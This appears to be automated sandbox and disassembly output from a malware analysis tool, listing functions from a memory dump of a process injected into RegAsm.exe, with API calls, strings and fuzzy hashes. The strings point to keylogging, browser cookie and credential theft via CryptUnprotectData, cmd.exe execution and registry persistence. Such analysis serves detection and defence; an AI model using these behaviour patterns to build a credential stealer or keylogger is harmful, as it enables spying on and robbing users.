Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
_free.LIBCMT ref: 00443540
_free.LIBCMT ref: 0044354A

Strings

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 0044346C, 00443473, 004434A2, 004434DA

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
API String ID: 2506810119-472202380
Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65951986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

Sleep.KERNEL32(000000FA,00465E74), ref: 00404138

Strings

/sort "Visit Time" /stext ", xrefs: 004040B2
0NG, xrefs: 00404097

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$0NG
API String ID: 368326130-3219657780
Opcode ID: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
Opcode Fuzzy Hash: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 0041CAD7

Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1

Strings

WallpaperStyle, xrefs: 0041CA22, 0041CA55, 0041CAA5
Control Panel\Desktop, xrefs: 0041CA1D, 0041CA50, 0041CAA0
TileWallpaper, xrefs: 0041CAC1

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF

Uniqueness

Uniqueness Score: -1.00%

Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004162F5

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4), ref: 004138AB

Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD

Strings

!D@, xrefs: 00417089
okmode, xrefs: 0041630F
PG, xrefs: 00416322

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$okmode$PG
API String ID: 3411444782-3370592832
Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6

PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
PathFileExistsW.SHLWAPI(00000000), ref: 0040C688

Strings

User Data\Default\Network\Cookies, xrefs: 0040C603
User Data\Profile ?\Network\Cookies, xrefs: 0040C635

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559

PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
PathFileExistsW.SHLWAPI(00000000), ref: 0040C757

Strings

User Data\Default\Network\Cookies, xrefs: 0040C6D2
User Data\Profile ?\Network\Cookies, xrefs: 0040C704

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698

Uniqueness

Uniqueness Score: -1.00%

Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Strings

Offline Keylogger Started, xrefs: 0040A19B, 0040A1A2, 0040A1CF

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
Opcode Fuzzy Hash: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB

Uniqueness

Uniqueness Score: -1.00%

Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86

Strings

Online Keylogger Started, xrefs: 0040AF03, 0040AF0C, 0040AF36

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
Opcode Fuzzy Hash: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB

Uniqueness

Uniqueness Score: -1.00%

Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
GetProcAddress.KERNEL32(00000000), ref: 00406A89

Strings

CryptUnprotectData, xrefs: 00406A78
crypt32, xrefs: 00406A7D

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
CloseHandle.KERNEL32(?), ref: 004051CA
SetEvent.KERNEL32(?), ref: 004051D9

Strings

Connection Timeout, xrefs: 00405198

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E833

Strings

ios_base::eofbit set, xrefs: 0040E822
ios_base::failbit set, xrefs: 0040E815
ios_base::badbit set, xrefs: 0040E7EF

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B

Uniqueness

Uniqueness Score: -1.00%

Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
RegSetValueExW.ADVAPI32 ref: 0041384D
RegCloseKey.ADVAPI32(004752D8), ref: 00413858

Strings

pth_unenc, xrefs: 00413818

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94

Uniqueness

Uniqueness Score: -1.00%

Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0

Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E016

Strings

bad locale name, xrefs: 0040E000

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C

Uniqueness

Uniqueness Score: -1.00%

Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
ShowWindow.USER32(00000009), ref: 00416C61
SetForegroundWindow.USER32 ref: 00416C6D

Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
String ID: !D@
API String ID: 3446828153-604454484
Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D

Uniqueness

Uniqueness Score: -1.00%

Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130

Strings

cmd.exe, xrefs: 00416125
/C , xrefs: 0041610E
open, xrefs: 0041612A

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
UnhookWindowsHookEx.USER32 ref: 0040B8C7
TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5

Strings

pth_unenc, xrefs: 0040B8AC

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: pth_unenc
API String ID: 3123878439-4028850238
Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
GetProcAddress.KERNEL32(00000000), ref: 0040141B

Strings

User32.dll, xrefs: 0040140F
GetCursorInfo, xrefs: 0040140A

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

Uniqueness

Uniqueness Score: -1.00%

Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
GetProcAddress.KERNEL32(00000000), ref: 004014C0

Strings

User32.dll, xrefs: 004014B4
GetLastInputInfo, xrefs: 004014AF

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

Uniqueness

Uniqueness Score: -1.00%

Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044A08F
__alldvrm.LIBCMT ref: 0044A290
__alldvrm.LIBCMT ref: 0044A2B2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788

Uniqueness

Uniqueness Score: -1.00%

Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
CloseHandle.KERNEL32(?), ref: 00404DDB

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

Uniqueness

Uniqueness Score: -1.00%

Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040C021
Sleep.KERNEL32(00001388), ref: 0040C0A9

Strings

[Cleared browsers logins and cookies.], xrefs: 0040C0E4
Cleared browsers logins and cookies., xrefs: 0040C0F5

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594

Sleep.KERNEL32(000001F4), ref: 0040A573
Sleep.KERNEL32(00000064), ref: 0040A5FD

Strings

], xrefs: 0040A57B
[ , xrefs: 0040A58F

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
Opcode Fuzzy Hash: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB

Uniqueness

Uniqueness Score: -1.00%

